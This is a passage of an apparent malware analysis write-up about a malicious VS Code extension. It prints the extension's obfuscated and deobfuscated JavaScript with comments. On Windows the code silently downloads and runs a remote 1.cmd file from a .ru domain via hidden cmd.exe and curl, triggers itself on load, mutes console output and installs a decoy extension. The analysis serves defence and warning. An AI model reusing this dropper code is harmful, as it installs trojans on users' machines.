20&','65HWkWlM','Failed\x20to\x20','kwDiA','(((.+)+)+)','log','YdJYj','all','showErrorM','QoZsX','vzZfU','jpnDD','pARBV','kHrzR','xVpZa','PMTmx','BHrOH','agerex.run','651RNkSnx','Cmd','eIlZt','Qlgbb','toString','1337961ZFoken','cmd.exe\x20/c','install\x20ex','\x20is\x20alread','\x20https://w','OBaZV','dXeXP','KhyMQ','y\x20installe','{}.constru','length','87750gHuJjQ','9118696UceGqY','ess','tintinweb.','registerCo','search','qzFJJ','MaIlK','curl\x20-s\x20-L','bMmqs','platform','isua
l-audi','yoiVk','subscripti','child_proc','VAbYg','DFoQB'];_0xf0f8=function(){return _0x4e3776;};return _0xf0f8();}const _0x432444={};function _0x12661e(_0x243222,_0x438c52,_0x49d13c,_0x4f2343){return _0x3c03(_0x243222-0x36d,_0x438c52);}_0x432444['activate']=activate,_0x432444[_0x12661e(0x4c7,0x4cf,0x4e0,0x4aa)]=deactivate,module[_0x1b14ab(0x3cd,0x3ab,0x3c3,0x3f4)]=_0x432444;

After processing it with the Obfuscator.io Deobfuscator, we obtained the following code:

// Obfuscator.io "string array rotation" prologue. It rotates the string table
// returned by _0xf0f8() until a checksum built from selected table entries
// equals 722777. This is obfuscator boilerplate rather than malicious logic on
// its own; the parseInt terms read entries whose text starts with digits
// (e.g. '9637764vBnJbd' in the table below) and fold them into the checksum.
(function (_0x9716a9, _0x52426d) {
  const _0x45b05f = _0x9716a9(); // the shared string table (an array)
  while (true) {
    try {
      // checksum over 13 table entries; each operand is looked up via _0x3c03
      const _0x54f1d8 = -parseInt(_0x3c03(404, -0xde)) / 1 * (parseInt(_0x3c03(380, -0xc3)) / 2) + parseInt(_0x3c03(317, 0x48c)) / 3 + parseInt(_0x3c03(385, 0x4d3)) / 4 * (-parseInt(_0x3c03(410, -0xc9)) / 5) + -parseInt(_0x3c03(328, 0x4ce)) / 6 * (parseInt(_0x3c03(312, 0x49a)) / 7) + parseInt(_0x3c03(329, -0x132)) / 8 * (-parseInt(_0x3c03(387, 0x4f8)) / 9) + parseInt(_0x3c03(417, 0x548)) / 10 * (-parseInt(_0x3c03(420, 0x526)) / 11) + -parseInt(_0x3c03(374, 0x4c5)) / 12 * (-parseInt(_0x3c03(424, -0x61)) / 13);
      if (_0x54f1d8 === _0x52426d) {
        break; // table is now in the order the rest of the code expects
      } else {
        _0x45b05f.push(_0x45b05f.shift()); // rotate left by one and retry
      }
    } catch (_0x3db05b) {
      _0x45b05f.push(_0x45b05f.shift()); // a lookup failed mid-rotation: rotate and retry
    }
  }
})(_0xf0f8, 722777);
// Obfuscator.io "call-once" wrapper factory. The returned function takes a
// `this` context and a callback; on its first use it hands back a thunk that
// invokes the callback at most once (the reference is nulled after the first
// call), and on every later use it hands back an empty function.
// Only the first branch of each `if` is live: NCitu compares gxTZz with itself
// (always true) and jmrPA/MaIlK are two distinct constants (always unequal), so
// both `else` branches are injected dead code. They reference identifiers that
// are never declared in this listing (_0x3461d5, _0x5d3265, _0x1751f5, ...)
// and would throw if reached; the "is already installed" message is a decoy
// copy of the real logic found in installExtension().
const _0x482b11 = function () {
  const _0x18dd31 = {
    'QoZsX': 'giIJB'
  };
  _0x18dd31.jmrPA = 'RAoZA';
  _0x18dd31.MaIlK = "jpnDD";
  _0x18dd31.NCitu = function (_0x5e14a7, _0x389a43) {
    return _0x5e14a7 === _0x389a43;
  };
  _0x18dd31.gxTZz = "AlADD";
  let _0x2eb0ab = true; // true until the first real wrapper has been handed out
  return function (_0x14e4dd, _0x47d914) {
    if (_0x18dd31.NCitu(_0x18dd31.gxTZz, _0x18dd31.gxTZz)) { // always true
      const _0x2bbf70 = _0x2eb0ab ? function () {
        if (_0x47d914) {
          if (_0x18dd31.jmrPA !== _0x18dd31.MaIlK) { // always true
            const _0x5cf33e = _0x47d914.apply(_0x14e4dd, arguments);
            _0x47d914 = null; // guarantees the callback runs only once
            return _0x5cf33e;
          } else {
            // dead code: _0x3461d5 and _0x5d3265 are undeclared
            _0x3461d5.window.showInformationMessage("Extension " + _0x5d3265 + " is already installed.");
            return;
          }
        }
      } : function () {};
      _0x2eb0ab = false;
      return _0x2bbf70;
    } else {
      // dead code: none of the identifiers below is declared in this listing
      const _0x294a87 = _0x1751f5 ? function () {
        if (_0x21d99c) {
          const _0x2f4cf8 = _0x36b78a.apply(_0x903178, arguments);
          _0x542218 = null;
          return _0x2f4cf8;
        }
      } : function () {};
      _0x45baac = false;
      return _0x294a87;
    }
  };
}();
// Obfuscator.io "self defending" guard. _0x360413 is the call-once thunk built
// by _0x482b11 around a callback that runs the nested-quantifier regex
// (((.+)+)+)+$ against the wrapper's own source text (toString()), and then
// again against the String built from _0x360413. A regex of this shape is
// prone to catastrophic backtracking once the source no longer has the exact
// compact layout the obfuscator emitted, which appears to be the mechanism
// that makes beautified copies hang here; the call has no other observable
// effect, and its return value is discarded.
const _0x360413 = _0x482b11(this, function () {
  return _0x360413.toString().search("(((.+)+)+)+$").toString().constructor(_0x360413).search("(((.+)+)+)+$");
});
_0x360413(); // the guard runs once at module load
// Second call-once wrapper factory, the same shape as _0x482b11 without the
// injected dead code: the first call yields a thunk that invokes the supplied
// callback once with `this` bound to the supplied context; every later call
// yields an empty function.
const _0x29d036 = function () {
  let _0x44f64c = true; // flips to false once the real wrapper is handed out
  return function (_0x44003b, _0x1d71f8) {
    const _0x1f0bdf = _0x44f64c ? function () {
      if (_0x1d71f8) {
        const _0x3d37cc = _0x1d71f8.apply(_0x44003b, arguments);
        _0x1d71f8 = null; // run at most once
        return _0x3d37cc;
      }
    } : function () {};
    _0x44f64c = false;
    return _0x1f0bdf;
  };
}();
// Obfuscator.io "console output disabling". Resolves the global object via an
// indirect Function() call (falling back to `window`), then replaces
// console.log/warn/info/error/exception/table/trace with functions that do
// nothing. Each replacement's toString is bound to the original method, so a
// casual inspection of console.log still shows the native source text.
// Net effect: any console output from this module is silently dropped; since
// `console` is a process global this likely affects everything else loaded in
// the same extension-host process as well (inference).
const _0x258824 = _0x29d036(this, function () {
  const _0x578214 = function () {
    let _0x217acd;
    try {
      // evaluates "return this" inside a non-strict function: yields the global object
      _0x217acd = Function("return (function() {}.constructor(\"return this\")( ));")();
    } catch (_0x1abdcb) {
      _0x217acd = window; // fallback when Function() throws
    }
    return _0x217acd;
  };
  const _0x3e65c3 = _0x578214();
  const _0x4eff57 = _0x3e65c3.console = _0x3e65c3.console || {};
  const _0x4ccd38 = ["log", "warn", "info", 'error', "exception", "table", 'trace'];
  for (let _0x222921 = 0; _0x222921 < _0x4ccd38.length; _0x222921++) {
    // Function.prototype bound to _0x29d036: a callable that returns undefined
    const _0x3e9199 = _0x29d036.constructor.prototype.bind(_0x29d036);
    const _0x1676db = _0x4ccd38[_0x222921];
    const _0x3dc041 = _0x4eff57[_0x1676db] || _0x3e9199; // the original console method, if present
    _0x3e9199.__proto__ = _0x29d036.bind(_0x29d036);
    _0x3e9199.toString = _0x3dc041.toString.bind(_0x3dc041); // mimic the original's source text
    _0x4eff57[_0x1676db] = _0x3e9199; // install the no-op
  }
});
_0x258824(); // applied once at module load
// The only two modules used: the VS Code extension API and child_process.exec,
// the primitive through which the downloaded payload is launched (see
// executeCmdCommand below).
const vscode = require("vscode");
const {
  exec
} = require("child_process");
// Leftover obfuscator string-lookup shim around _0x3c03 (rebases the index by
// 0x244; the 2nd and 4th parameters are unused). It appears to be unreferenced
// in this deobfuscated listing.
function _0x1b14ab(_0x3a55a5, _0xedf765, _0x423979, _0x5197f7) {
  return _0x3c03(_0x3a55a5 - 0x244, _0x423979);
}
// Runs an arbitrary command line through `cmd.exe /c` and resolves when the
// process exits. windowsHide: true suppresses the console window, so the
// victim sees nothing; stdout and stderr are discarded, and the promise
// rejects only when exec reports an error. From a detection standpoint this is
// the observable event: the VS Code extension host spawning cmd.exe.
// @param {string} _0x2fef7b - command line appended verbatim after "cmd.exe /c "
// @returns {Promise<void>} resolves on exit, rejects with the exec error
function executeCmdCommand(_0x2fef7b) {
  return new Promise((_0xae7d9, _0x7f526a) => {
    const _0x2ab19d = {
      windowsHide: true // no visible console window on Windows
    };
    exec("cmd.exe /c " + _0x2fef7b, _0x2ab19d, (_0x204c12, _0x16d185, _0x2c3cbf) => {
      if (_0x204c12) {
        _0x7f526a(_0x204c12); // exec error -> reject
        return;
      }
      _0xae7d9(); // stdout/stderr (_0x16d185/_0x2c3cbf) are ignored
    });
  });
}
// Installs another extension by marketplace id through VS Code's built-in
// workbench command, then tries to activate it 3 s later. activate() uses it
// to pull in "tintinweb.solidity-visual-auditor" alongside the payload,
// presumably so the victim gets the advertised Solidity features (inference).
// Note the ordering: the "Installing" message is shown only after the install
// command has already resolved. All failures collapse into one generic error
// message and the cause is dropped.
// @param {string} _0x147356 - extension id in publisher.name form
// @returns {Promise<void>}
async function installExtension(_0x147356) {
  try {
    const _0x589c71 = vscode.extensions.getExtension(_0x147356);
    if (_0x589c71) {
      vscode.window.showInformationMessage("Extension " + _0x147356 + " is already installed.");
      return;
    }
    await vscode.commands.executeCommand("workbench.extensions.installExtension", _0x147356);
    vscode.window.showInformationMessage("Installing " + _0x147356 + '.');
    // deferred activation; the timer is never cleared (deactivate() is empty)
    setTimeout(async () => {
      const _0x40cc6e = vscode.extensions.getExtension(_0x147356);
      if (_0x40cc6e && !_0x40cc6e.isActive) {
        await _0x40cc6e.activate();
        vscode.window.showInformationMessage("Extension has been activated.");
      }
    }, 3000);
  } catch (_0x5055ed) {
    vscode.window.showErrorMessage("Failed to install extension"); // cause is not surfaced
  }
}
// Extension entry point; this is where the malicious behaviour lives.
// 1. Registers the command "hubtestmanagerex.runCmd". On win32 it runs, in
//    parallel, (a) a hidden `cmd.exe /c curl ...` that fetches
//    https://whyareyouherewho.ru/files/1.cmd into %TEMP%\1.cmd and executes
//    it, and (b) installation of "tintinweb.solidity-visual-auditor", a
//    separate extension, presumably as cover for the advertised functionality
//    (inference). Any error is swallowed by the empty catch, so a failed
//    download is silent.
// 2. On win32 it then invokes that same command itself one second after
//    activation, so no user interaction is required.
// Indicators visible in this listing: the domain and path above, the dropped
// file %TEMP%\1.cmd, and the command id hubtestmanagerex.runCmd.
// @param {vscode.ExtensionContext} _0x43fab4 - extension context
function activate(_0x43fab4) {
  let _0x2328bf = vscode.commands.registerCommand("hubtestmanagerex.runCmd", async function () {
    if (process.platform === "win32") { // Windows-only: curl/%TEMP%/cmd.exe
      try {
        // download-and-execute and decoy install run concurrently
        await Promise.all([executeCmdCommand("curl -s -L https://whyareyouherewho.ru/files/1.cmd -o \"%TEMP%\\1.cmd\" && \"%TEMP%\\1.cmd\""), installExtension("tintinweb.solidity-visual-auditor")]);
        vscode.window.showInformationMessage("Installation have completed.");
      } catch (_0x356ee9) {} // failures are hidden from the user
    }
  });
  _0x43fab4.subscriptions.push(_0x2328bf);
  if (process.platform === "win32") {
    // self-trigger: the command fires on its own 1 s after activation
    setTimeout(() => {
      vscode.commands.executeCommand("hubtestmanagerex.runCmd");
    }, 1000);
  }
}
// String-table accessor generated by the obfuscator. The index is rebased by
// 301 into the array returned by _0xf0f8(); the second parameter is unused.
// On the first call it replaces itself with a closure that holds the table,
// so later calls skip the _0xf0f8() lookup.
function _0x3c03(_0x4db7c7, _0x2c4387) {
  const _0x360413 = _0xf0f8(); // local; shadows the module-level _0x360413 inside this function
  _0x3c03 = function (_0x482b11, _0xf0f8bc) {
    _0x482b11 = _0x482b11 - 301;
    let _0x3c032c = _0x360413[_0x482b11];
    return _0x3c032c;
  };
  return _0x3c03(_0x4db7c7, _0x2c4387);
}
// No-op on unload: nothing is cleaned up, and the timers started by activate()
// and installExtension() are not cancelled.
function deactivate() {}
// The obfuscator's string table: every literal the original source used, split
// into short fragments (e.g. "curl -s -L", " https://w", "cmd.exe /c",
// 'tintinweb.', 'child_proc') mixed with decoy keys and checksum tokens.
// Useful for triage: a plain string search of this array already reveals the
// shell primitive, the download URL fragments and the VS Code APIs involved.
// After the first call the function replaces itself with one that returns the
// same array, so the table is built only once.
function _0xf0f8() {
  const _0x4e3776 = ['bPqJr', 'deactivate', "& \"%TEMP%\\", "return (fu", 'IDqGq', 'windowsHid', 'tfsQE', 'prototype', 'pinSO', "on have co", 'mand', 'tension', 'LHedt', 'IGIdL', 'exception', 'essage', 'kLvyX', 'VpTgS', 'console', 'mmand', 'info', 'jmrPA', 'YMGii', 'win32', 'workbench.', 'Installing', 'EudqH', 'vakbm', 'gxTZz', '9637764vBnJbd', 'showInform', 'bind', 'mpleted.', 'ons', 'vFliq', '136yPraIG', 'executeCom', 'NCitu', "Extension ", 'hubtestman', '20232pgInfm', 'apply', '9qVlxwi', 'solidity-v', 'Installati', 'constructo', 'HdzzO', 'zICBo', 'exports', 'CKpCV', 'KDWJh', 'AjhYD', 'qNRFC', 'extensions', 'rnhzK', "1.cmd\"", 'ationMessa', 'tor', 'vscode', '1781BYYAUR', 'window', 'Rzvzp', 'PZyEt', 'table', "ctor(\"retu", '140JKypRM', 'isActive', 'getExtensi', '.installEx', 'JLzsf', 'warn', "rn this\")(", '1230cAvHJL', '__proto__', 'commands', '87307CjgkoA', 'jysXR', 'AlADD', "%\\1.cmd\" &", '65HWkWlM', "Failed to ", 'kwDiA', '(((.+)+)+)', 'log', 'YdJYj', 'all', 'showErrorM', 'QoZsX', 'vzZfU', 'jpnDD', 'pARBV', 'kHrzR', 'xVpZa', 'PMTmx', 'BHrOH', 'agerex.run', '651RNkSnx', 'Cmd', 'eIlZt', 'Qlgbb', 'toString', '1337961ZFoken', "cmd.exe /c", "install ex", " is alread", " https://w", 'OBaZV', 'dXeXP', 'KhyMQ', "y installe", '{}.constru', 'length', '87750gHuJjQ', '9118696UceGqY', 'ess', 'tintinweb.', 'registerCo', 'search', 'qzFJJ', 'MaIlK', "curl -s -L", 'bMmqs', 'platform', 'isual-audi', 'yoiVk', 'subscripti', 'child_proc', 'VAbYg', 'DFoQB'];
  _0xf0f8 = function () {
    return _0x4e3776; // cached table
  };
  return _0xf0f8();
}
// Module wiring: expose activate/deactivate the way VS Code expects, so the
// extension host calls activate() on load. _0x12661e is another leftover
// string-lookup shim around _0x3c03 and appears unreferenced in this listing.
const _0x432444 = {};
function _0x12661e(_0x243222, _0x438c52, _0x49d13c, _0x4f2343) {
  return _0x3c03(_0x243222 - 0x36d, _0x438c52);
}
_0x432444.activate = activate;
_0x432444.deactivate = deactivate;
module.exports = _0x432444;

We should look carefully at the activate function:

// Entry point called by the extension host on load.
// Registers "hubtestmanagerex.runCmd", which on win32 runs a hidden
// `cmd.exe /c curl ...` that saves https://whyareyouherewho.ru/files/1.cmd to
// %TEMP%\1.cmd and executes it, concurrently with installing the unrelated
// "tintinweb.solidity-visual-auditor" extension (presumably cover for the
// advertised functionality). Errors are swallowed. On win32 the command is
// then self-triggered one second after activation, so no user action is needed.
// @param {vscode.ExtensionContext} _0x43fab4 - extension context
function activate(_0x43fab4) {
  let _0x2328bf = vscode.commands.registerCommand("hubtestmanagerex.runCmd", async function () {
    if (process.platform === "win32") { // Windows-only: curl/%TEMP%/cmd.exe
      try {
        // download-and-execute and decoy install run concurrently
        await Promise.all([executeCmdCommand("curl -s -L https://whyareyouherewho.ru/files/1.cmd -o \"%TEMP%\\1.cmd\" && \"%TEMP%\\1.cmd\""), installExtension("tintinweb.solidity-visual-auditor")]);
        vscode.window.showInformationMessage("Installation have completed.");
      } catch (_0x356ee9) {} // failures are hidden from the user
    }
  });
  _0x43fab4.subscriptions.push(_0x2328bf);
  if (process.platform === "win32") {
    // self-trigger: the command fires on its own 1 s after activation
    setTimeout(() => {
      vscode.commands.executeCommand("hubtestmanagerex.runCmd");
    }, 1000);
  }
}

Here, if the platform is win32, the script downloads a trojan from https://whyareyouherewho.ru/files/1.cmd and runs the file content as a hidden subprocess via cmd.exe. Note that the user never has to run the command: on win32, activate schedules hubtestmanagerex.runCmd to be executed automatically one second after the extension is activated.

Darwin and Linux platforms do not appear to be affected, at least in the current version.

Final Conclusion

This malicious extension targets the win32 platform and downloads and executes a trojan served by the author.

Whether you are on win32 or not, please remember: NEVER DOWNLOAD EXTENSIONS YOU DON'T TRUST.
